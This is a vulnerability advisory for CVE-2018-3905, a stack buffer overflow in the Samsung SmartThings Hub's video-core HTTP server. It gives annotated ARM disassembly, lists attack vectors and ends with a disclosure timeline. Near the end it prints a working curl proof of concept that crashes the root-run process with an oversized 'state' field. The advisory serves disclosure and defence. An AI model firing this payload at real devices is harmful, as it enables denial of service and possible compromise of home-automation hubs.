CVE-2018-3905
An exploitable buffer overflow vulnerability exists in the camera “create” feature of video-core
’s HTTP server of Samsung SmartThings Hub. The video-core
process incorrectly extracts the “state” field from a user-controlled JSON payload, leading to a buffer overflow on the stack. An attacker can send an HTTP request to trigger this vulnerability.
Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17
https://www.smartthings.com/products/smartthings-hub
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-120: Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)
Samsung produces a series of devices aimed at controlling and monitoring a home, such as wall switches, LED bulbs, thermostats and cameras. One of those is the Samsung SmartThings Hub, a central controller which allows an end user to use their smartphone to connect to their house remotely and operate other devices through it. The hub board utilizes several systems on chips. The firmware in question is executed by an i.MX 6 SoloLite processor (Cortex-A9), which has an ARMv7-A architecture.
The firmware is Linux-based, and runs a series of daemons that interface with devices nearby via ethernet, ZigBee, Z-Wave and Bluetooth protocols. Additionally, the hubCore
process is responsible for communicating with the remote SmartThings servers via a persistent TLS connection. These servers act as a bridge that allows for secure communication between the smartphone application and the hub. End users can simply install the SmartThings mobile application on their smartphone to control the hub remotely.
One of the features of the hub is that it connects to smart cameras, configures them and looks at their livestreams. For testing, we set up the Samsung SmartCam SNH-V6414BN on the hub. Once done, the livestream can be displayed by the smartphone application by connecting either to the remote SmartThings servers, or directly to the camera, if they’re both in the same subnetwork.
Inside the hub, the livestream is handled by the video-core
process, which uses ffmpeg
to connect via RTSP to the smart camera in its same local network, and at the same time, provides a streamable link on the smartphone application.
The remote SmartThings servers have the possibility to communicate with the video-core
process by sending messages in the persistent TLS connection, established by the hubCore
process. These messages can encapsulate an HTTP request, which hubCore
would relay directly to the HTTP server exposed by video-core
. The HTTP server listens on port 3000, bound to the localhost address, so a local connection is needed to perform this request.
We identified a vulnerable request that can be exploited to achieve code execution on the video-core
process, which is running as root.
By sending a POST request for the “/cameras” path, it’s possible to add a new camera to the hub.
Such request is handled by function sub_48A14
:
.text:00048A14 sub_48A14
.text:00048A14
.text:00048A14 dest = -0x4364
.text:00048A14 var_4300= -0x4300
.text:00048A14 var_4200= -0x4200
.text:00048A14 var_4000= -0x4000
.text:00048A14 var_3E80= -0x3E80
.text:00048A14 var_3C80= -0x3C80
.text:00048A14 var_3A80= -0x3A80
.text:00048A14 var_2040= -0x2040
.text:00048A14 arg_0 = 4
.text:00048A14 buffer = 8
.text:00048A14 arg_8 = 0xC
.text:00048A14 arg_10 = 0x14
.text:00048A14
.text:00048A14 000 MOV R12, #:lower16:dword_C4DCC
.text:00048A18 000 STMFD SP!, {R4-R11,LR}
.text:00048A1C 024 MOVT R12, #:upper16:dword_C4DCC
.text:00048A20 024 ADD R11, SP, #0x20
.text:00048A24 024 SUB SP, SP, #0x4300
.text:00048A28 4324 MOV R5, R3
.text:00048A2C 4324 SUB SP, SP, #0x54
...
.text:00048A8C 4378 BL http_required_json_parameters ; [1]
.text:00048A90 4378 MOV R5, R0
.text:00048A94 4378 SUB R0, R11, #-var_4000
.text:00048A98 4378 MOV R1, R6
.text:00048A9C 4378 MOV R2, #0x2044
.text:00048AA0 4378 SUB R0, R0, #0xAC
.text:00048AA4 4378 BL memset
.text:00048AA8 4378 SUB R0, R11, #-var_4000
.text:00048AAC 4378 SUB R0, R0, #0xAC
.text:00048AB0 4378 BL clear_buffers
.text:00048AB4 4378 CMP R5, R6
.text:00048AB8 4378 BNE loc_48ADC
...
.text:00048ADC loc_48ADC
.text:00048ADC 000 MOV R0, R4
.text:00048AE0 000 BL json_tokener_parse ; [2]
.text:00048AE4 000 SUBS R5, R0, #0
.text:00048AE8 000 BEQ loc_48BEC
.text:00048AEC 000 SUB R0, R11, #-var_4000
.text:00048AF0 000 MOV R1, R5
.text:00048AF4 000 SUB R0, R0, #0xAC
.text:00048AF8 000 BL sub_48438 ; [3]
Note that the binary embeds the “json-c” library that is used to manage JSON objects.
The function initially calls http_required_json_parameters
at [1] to verify that all the required parameters are specified in the JSON request, the parameters are: cameraId
, locationId
, dni
, url
.
At [2] the function parses the JSON payload received in the request using json_tokener_parse
, which returns a json_object
. It then calls sub_48438
[3] passing the pointer to a local stack buffer and the json_object
as parameters.
.text:00048438 sub_48438
.text:00048438
.text:00048438 000 STMFD SP!, {R4-R9,LR}
.text:0004843C 01C MOV R4, R1
.text:00048440 01C SUB SP, SP, #0x244
.text:00048444 260 MOV R1, #:lower16:aCameraid_1 ; "cameraId"
.text:00048448 260 MOV R6, R0
.text:0004844C 260 ADD R2, SP, #0x260+value
.text:00048450 260 MOV R0, R4 ; jso
.text:00048454 260 MOVT R1, #:upper16:aCameraid_1 ; "cameraId"
.text:00048458 260 BL json_object_object_get_ex ; [4]
.text:0004845C 260 CMP R0, #0
.text:00048460 260 BNE loc_48488
...
.text:000485AC 260 MOV R1, #:lower16:aLocationid_0 ; "locationId"
.text:000485B0 260 STR R7, [R6,#4]
.text:000485B4 260 MOVT R1, #:upper16:aLocationid_0 ; "locationId"
.text:000485B8 260 MOV R0, R4 ; jso
.text:000485BC 260 ADD R2, SP, #0x260+value
.text:000485C0 260 BL json_object_object_get_ex ; [4]
.text:000485C4 260 CMP R0, #0
.text:000485C8 260 BNE loc_48638
...
.text:000486FC 260 MOV R1, #:lower16:aDni ; "dni"
.text:00048700 260 STR R7, [R6,#0x208]
.text:00048704 260 MOVT R1, #:upper16:aDni ; "dni"
.text:00048708 260 MOV R0, R4 ; jso
.text:0004870C 260 ADD R2, SP, #0x260+value
.text:00048710 260 BL json_object_object_get_ex ; [4]
.text:00048714 260 CMP R0, #0
.text:00048718 260 BNE loc_48790
...
.text:00048850 260 MOV R1, #:lower16:aUrl_0 ; "url"
.text:00048854 260 STR R7, [R6,#0x40C]
.text:00048858 260 MOVT R1, #:upper16:aUrl_0 ; "url"
.text:0004885C 260 MOV R0, R4 ; jso
.text:00048860 260 ADD R2, SP, #0x260+value
.text:00048864 260 BL json_object_object_get_ex ; [4]
.text:00048868 260 CMP R0, #0
.text:0004886C 260 BNE loc_488DC
...
.text:00048938 260 MOV R1, #:lower16:aState ; "state"
.text:0004893C 260 STR R0, [R6,#0xE24]
.text:00048940 260 MOVT R1, #:upper16:aState ; "state"
.text:00048944 260 STRH R3, [R12,#0xC]
.text:00048948 260 MOV R0, R4 ; jso
.text:0004894C 260 STRB LR, [R6,#0xE2E]
.text:00048950 260 BL json_object_object_get_ex ; [4]
.text:00048954 260 CMP R0, #0
.text:00048958 260 BNE loc_489E0
...
.text:000489E0 loc_489E0
.text:000489E0 260 LDR R0, [SP,#0x260+value]
.text:000489E4 260 BL json_object_to_json_string ; [5]
.text:000489E8 260 MOV R7, R0
.text:000489EC 260 BL strlen ; [6]
.text:000489F0 260 MOV R4, R0
.text:000489F4 260 ADD R0, R6, #0x810
.text:000489F8 260 MOV R1, R7
.text:000489FC 260 MOV R2, R4
.text:00048A00 260 ADD R0, R0, #8
.text:00048A04 260 BL memcpy ; [7]
The purpose of this function is to extract each parameter and store it in the buffer passed as argument. Each parameter is extracted using the following sequence:
- Call to `json_object_object_get_ex` [4] and `json_object_to_json_string` [5] for extracting a parameter by key name.
- Copy the parameter value in a buffer on the stack, using `strlen` [6] and `memcpy` [7].
Additionally, before calling memcpy
, the parameters “cameraId”, “locationId” and “dni” are verified using regular expressions, and the “url” parameter is simply truncated to a maximum length of 0x200.
However, the “state” parameter is not sanitized in any way. In fact, we can see that the length
value for the memcpy
call [7] is set from the strlen
[6] output of the source string itself. At high level this would be:
memcpy(stack_buffer, state, strlen(state));
Since state
is controlled by the user, there is no restriction on the length of the copy operation, which allows for overflowing the stack buffer, and potentially arbitrary code execution.
We identified two different vectors that allow for exploiting this vulnerability:
hubCore
that would be relayed without modification to the vulnerable video-core
process.hubCore
process, and is allowed to make any localhost connection. It is thus possible for a SmartApp to send arbitrary HTTP requests directly to the vulnerable video-core
process.A third vector might exist, but we decided not to test it to avoid damaging any live infrastructure. This would consist of sending a malicious request from the SmartThings mobile application to the remote SmartThings servers. In turn, depending on the remote APIs available, the servers could relay the malicious payload back to the device via the persistent TLS connection. To use this vector, an attacker would need to own a valid OAuth bearer token, or the relative username and password pair to obtain it.
The following proof of concept shows how to crash the video-core
process:
$ curl -X POST "http://127.0.0.1:3000/cameras" -d '{"cameraId":"00000000-0000-0000-0000-000000000000","locationId":"00000000-0000-0000-0000-000000000000","dni":"000000000000","url":"x","state":"'$(perl -e 'print "A"x700')'"}'
2018-04-16 - Vendor Disclosure
2018-05-23 - Discussion with vendor/review of timeline for disclosure
2018-07-17 - Vendor patched
2018-07-26 - Public Release
Discovered by Claudio Bozzato of Cisco Talos.